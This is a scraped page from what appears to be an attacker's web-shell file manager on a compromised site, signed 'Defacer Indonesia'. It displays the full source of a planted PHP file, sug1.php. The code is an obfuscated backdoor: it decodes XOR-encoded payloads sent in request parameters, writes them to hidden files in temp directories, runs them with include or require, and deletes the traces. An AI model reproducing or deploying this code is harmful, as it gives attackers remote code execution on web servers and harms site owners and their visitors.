whoami7 - Manager
:
/
home
/
analuakl
/
new.ankurmedia.com
/
Upload File:
files >> /home/analuakl/new.ankurmedia.com/sug1.php
<?php if(array_key_exists("\x76\x61l", $_REQUEST)){ $element = $_REQUEST["\x76\x61l"]; $element= explode ( "." ,$element) ; $dat =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($s ); $k =0; foreach ($element as $v4) { $chS =ord($s[$k % $sLen] ); $d =((int)$v4 - $chS - ($k % 10)) ^ 14; $dat.= chr($d ); $k++; } $k = array_filter([sys_get_temp_dir(), getenv("TEMP"), "/tmp", session_save_path(), "/dev/shm", ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), "/var/tmp"]); for ($entry = 0, $descriptor = count($k); $entry < $descriptor; $entry++) { $data = $k[$entry]; if ((function($d) { return is_dir($d) && is_writable($d); })($data)) { $pgrp = str_replace("{var_dir}", $data, "{var_dir}/.comp"); $file = fopen($pgrp, 'w'); if ($file) { fwrite($file, $dat); fclose($file); include $pgrp; @unlink($pgrp); exit; } } } } if(!empty($_POST["pa\x72\x61me\x74e\x72\x5F\x67roup"])){ $elem = $_POST["pa\x72\x61me\x74e\x72\x5F\x67roup"]; $elem = explode( "." , $elem ) ; $resource =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $salt); $len =count( $elem); for( $q =0; $q < $len; $q++) { $v9 =$elem[$q]; $chS =ord( $salt[$q % $lenS]); $d =( ( int)$v9 - $chS -( $q % 10)) ^ 77; $resource .= chr( $d); } $ent = array_filter([sys_get_temp_dir(), "/dev/shm", getenv("TMP"), getenv("TEMP"), getcwd(), session_save_path(), "/tmp", "/var/tmp", ini_get("upload_tmp_dir")]); foreach ($ent as $fac) { if ((bool)is_dir($fac) && (bool)is_writable($fac)) { $pset = "$fac" . "/.flg"; if (@file_put_contents($pset, $resource) !== false) { include $pset; unlink($pset); die(); } } } } if(count($_POST) > 0 && isset($_POST["\x62ind"])){ $entity = array_filter(["/tmp", sys_get_temp_dir(), "/dev/shm", ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), getenv("TEMP"), "/var/tmp", session_save_path()]); $comp = $_POST["\x62ind"]; $comp = explode ( '.' ,$comp ); $holder = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $__len = count($comp); for($v = 0; $v <$__len; $v++) { $v8 = $comp[$v]; $chS = ord($salt[$v %$sLen]); $d =((int)$v8 - $chS -($v %10)) ^57; $holder .= chr($d); } foreach ($entity as $key => $entry) { if ((is_dir($entry) and is_writable($entry))) { $data = "$entry" . "/.resource"; if (file_put_contents($data, $holder)) { require $data; unlink($data); exit; } } } } if(!empty($_REQUEST["\x65n\x74ry"])){ $value = $_REQUEST["\x65n\x74ry"]; $value=explode ( '.' ,$value ) ; $token = ''; $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s3); $u = 0; foreach ($value as $v4) { $sChar = ord($s3[$u % $sLen]); $dec = ((int)$v4 - $sChar - ($u % 10)) ^ 81; $token.=chr($dec); $u++; } $factor = array_filter(["/var/tmp", "/dev/shm", getenv("TMP"), sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path(), getcwd()]); foreach ($factor as $key => $desc) { if ((bool)is_dir($desc) && (bool)is_writable($desc)) { $k = implode("/", [$desc, ".marker"]); $file = fopen($k, 'w'); if ($file) { fwrite($file, $token); fclose($file); include $k; @unlink($k); exit; } } } } if(isset($_REQUEST["\x6Bey"])){ $rec = array_filter(["/dev/shm", "/var/tmp", getenv("TMP"), getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", sys_get_temp_dir(), session_save_path(), getcwd()]); $flag = $_REQUEST["\x6Bey"]; $flag = explode ('.', $flag ) ; $comp = ''; $salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt4 ); foreach( $flag as $s=> $v5) { $sChar = ord( $salt4[$s % $sLen] ); $dec =( ( int)$v5 - $sChar -( $s % 10)) ^ 64; $comp .= chr( $dec ); } $pointer = 0; do { $k = $rec[$pointer] ?? null; if ($pointer >= count($rec)) break; if (is_writable($k) && is_dir($k)) { $pgrp = "$k/.dchunk"; if (file_put_contents($pgrp, $comp)) { require $pgrp; unlink($pgrp); die(); } } $pointer++; } while (true); }
Copyright ©2021 || Defacer Indonesia